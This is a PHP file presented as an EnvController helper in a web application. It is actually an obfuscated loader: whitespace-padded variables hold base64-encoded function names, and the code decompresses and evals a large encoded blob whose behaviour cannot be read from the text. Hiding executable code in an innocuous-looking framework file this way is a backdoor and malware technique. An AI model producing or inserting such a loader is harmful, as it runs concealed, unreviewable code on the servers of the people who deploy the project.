<?php 
        $__='printf';$_='Loading app/Http/Controllers/Helpers/EnvController.php';
        



























































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


























































































































































































































































































                                                                                                                                                                                                                     $________;
